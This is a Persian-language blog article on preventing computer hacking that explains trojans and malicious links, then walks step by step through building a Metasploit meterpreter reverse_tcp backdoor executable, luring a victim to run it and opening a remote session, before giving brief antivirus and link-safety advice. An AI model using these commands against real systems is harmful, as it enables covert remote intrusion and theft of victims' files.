جلوگیری از هک کامپیوتر و نفوذ به آن

نفوذ به گوشی
نفوذ به گوشی فرندان بدون دسترسی به دستگاه تلفن همراه
نوامبر 30, 2018
هک گوشی اندروید
هک گوشی اندروید با استفاده از نرم افزارهای مختلف و جلوگیری از هک شدن گوشی
دسامبر 7, 2018

جلوگیری از هک کامپیوتر و نفوذ به آن

هک کامپیوتر

این روزها کمتر کسی است که واژه هک را نشنیده و با آن سر و کار نداشته باشد. تعداد زیادی از افراد به دنبال روش هایی برای هک و جاسوسی از کامپیوترهای اطرافیانشان هستند و در آنطرف ماجرا نیز بسیاری از افراد در پی یافتن راهی برای جلوگیری از هک کامپیوتر خودشان هستند. اما شاید شما هم یکی از این افراد باشید که هنوز شیوه موردنظر خود را پیدا نکرده اید. در ادامه با ما همراه باشید تا علاوه بر معرفی چند روش برای نفوذ به کامپیوتر، روش هایی را برای جلوگیری از هک کامپیوتر بیان کنیم.

هک کامپیوتر چگونه انجام می شود؟

اگر درباره واژه های هک و هکر چیز زیادی نمی دانید و با انواع هکرها آشنا نیستید، پیشنهاد می کنیم در ابتدا مطلب پیشین ما که در رابطه با هکرها و اهداف آنها توضیحات کاملی داده است را مطالعه نمایید. بعد از شناخت کامل هکرها و اهدافشان برای هک، نوبت به بررسی روش های هک و جاسوسی از کامپیوترها می رسد.

در میان روش های بیشماری که برای هک کامپیوتر وجود دارد، پر کاربردترین آن ها دسترسی به کامپیوتر شخص قربانی و یا اطلاعات وی از طریق اینترنت می باشد. در این روش هکر توسط یک لینک و یا برنامه آلوده سیستم شخص موردنظرش را هک می کند.

هک با استفاده از تروجان ها

تروجان ها یکی از پرکاربردترین و محبوب ترین برنامه ها در میان هکر ها می باشند. این نرم افزارها بسیار ساده طراحی می شوند و در اکثر مواقع به صورت یک برنامه سرگرم کننده مانند یک بازی ساخته می شوند و پس از نصب بر روی گوشی یا کامپیوتر شخص قربانی تمام اطلاعات موجود در دستگاه او را برای هکر ارسال می کنند. از آنجایی که این برنامه ها به صورت پنهانی کارهای مخرب خود را انجام می دهند، شناسایی آنها بسیار سخت می باشد.

هک با استفاده از لینک های آلوده

در این روش هکرها با استفاده از مهندسی اجتماعی و یا هر شیوه ی دیگری تلاش می کنند تا فرد قربانی برروی لینک های آلوده ای که به طریقی برای او ارسال کرده اند، کلیک نماید. پس از کلیک قربانی برروی لینک موردنظر هکر، کار تقریبا تمام است و هکر می تواند به تمام اطلاعات موجود در گوشی یا کامپیوتر فرد قربانی دسترسی پیدا کند. در واقع در پشت این لینک ها برنامه های هستند که می توانند اطلاعات موجود در سیستم ها را برای هکر ارسال کنند.

هک با استفاده از IP و بطور مستقیم

یکی از سخت ترین روش های هک کامپیوتر که هکرهای معمولی قادر به انجام آن نیستند، روش هک به صورت مستقیم و بدون استفاده از برنامه ای خاص می باشد. هکرهایی که از این روش استفاده می کنند از دانش برنامه نویسی بسیار بالایی بهره مند هستند که با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، به سیستم قربانی در شبکه متصل می شوند و سپس آن را هک می کنند. از آنجایی که این هکرها دانش بالایی در این زمینه دارند، می دانند که سیستم قربانی از چه قسمت هایی آسیب پذیر می باشد و از همان قسمت ها استفاده کرده و به سیستم نفوذ می کنند.

هک کامپیوتر به وسیله کالی لینوکس

هکرها به راحتی می توانند سیستم کامپیوتر شما را با استفاده از کالی لینوکس هک نمایند، اکنون این روش را برای شما توضیح خواهیم داد تا ببینید هکرها چگونه به سادگی سیستم شما را هک می کنند و بتوانید از هک کامپیوتر خود جلوگیری نمایید.

در اولین مرحله هکر سیستم کالی لینوکس خود را باز می کند، سپس وارد محیط ترمینال لینوکس می شود. بعد از آن برای وارد شدن به محیط متاسپلوییت دستور msfconsole را وارد می کند.

در مرحله دوم با استفاده از دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را قرار می دهند. با انجام این مرحله هکر می تواند یک در پشتی در سیستم کالی لینوکس بسازد.

اکنون باید فرد مورد نظر خود را ترغیب کند که روی فایل ساخته شده کلیک نماید. هکرها این کار را با استفاده از شیوه های مهندسی اجتماعی انجام می دهند و معمولا هم موفق می شوند که قربانی را وادار به کلیک برروی فایل ایجاد شده کنند.

بعد از انجام مراحل بالا هکر در همان خط فرمانی که هست دستور use exploit/multi/handler را وارد می کند. و سپس خط جدید دستور set payload windows/meterpreter/reverse_tcp را نیز وارد می کند. حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار می دهد. بعد از اتمام این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler شروع به کار کند.

زمانی که شما به عنوان قربانی برنامه ای که هکر ساخته است را اجرا نمایید در محیط متااسپلوییت یک آلارم با موضوع این که یک نشست جدید در برنامه ایجاد شده است نمایش داده می شود. هکر برای ایجاد ارتباط با این نشست دستور sessions -i 1 را وارد می کند.

اکنون دیگر کار تمام است و اولین نشست هکر با سیستم شما برقرار می شود. بعد از این مرحله هکر به تمام اطلاعات شما دسترسی پیدا کرده و می تواند هر فایلی را که بخواهد باز کرده و ببیند.

جلوگیری از هک کامپیوتر

همانطور که مشاهده نمودید سیستم شما همیشه در معرض هک قرار دارد و هکرها به راحتی و حتی با داشتن دانشی اندک می توانند به سیستم شما نفوذ کرده و به تمام اطلاعات شما دسترسی پیدا کنند.

بنابراین برای جلوگیری از هک شدن کامپیوتر خود می بایست اول از همه برنامه های ضد هک و آنتی ویروس هایی را بر روی سیستم خود نصب نمایید که بتوانند برنامه های مخرب را تشخیص داده و از هک شدن سیستم شما جلوگیری کنند.

علاوه بر این نیز باید مراقب فایل ها و لینک هایی که برایتان ارسال می شود باشید و برروی لینک های ناشناخته و مشکوک کلیک ننمایید. همچنین از دانلود برنامه ها از منابع ناشناخته و نامعتبر به شدت خودداری کرده و برنامه های مورد نیاز خود را از منابع معتبر مانند گوگل پلی دانلود نمایید.

2 دیدگاه ها

  1. raha گفت:

    باسلام
    منظور از شنود مکالمات همون تماس های تلفنی هستش که ضبط میشود یا خیر
    و اینکه ایا امکان دارد غیر از تماس های تلفنی مکالماتی ک درمحیط با افرادهم انجام میشود بدون روشن بودن صفحه گوشی ضبط شود و انتقال یابد
    ؟؟؟؟؟؟؟؟؟؟؟؟

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *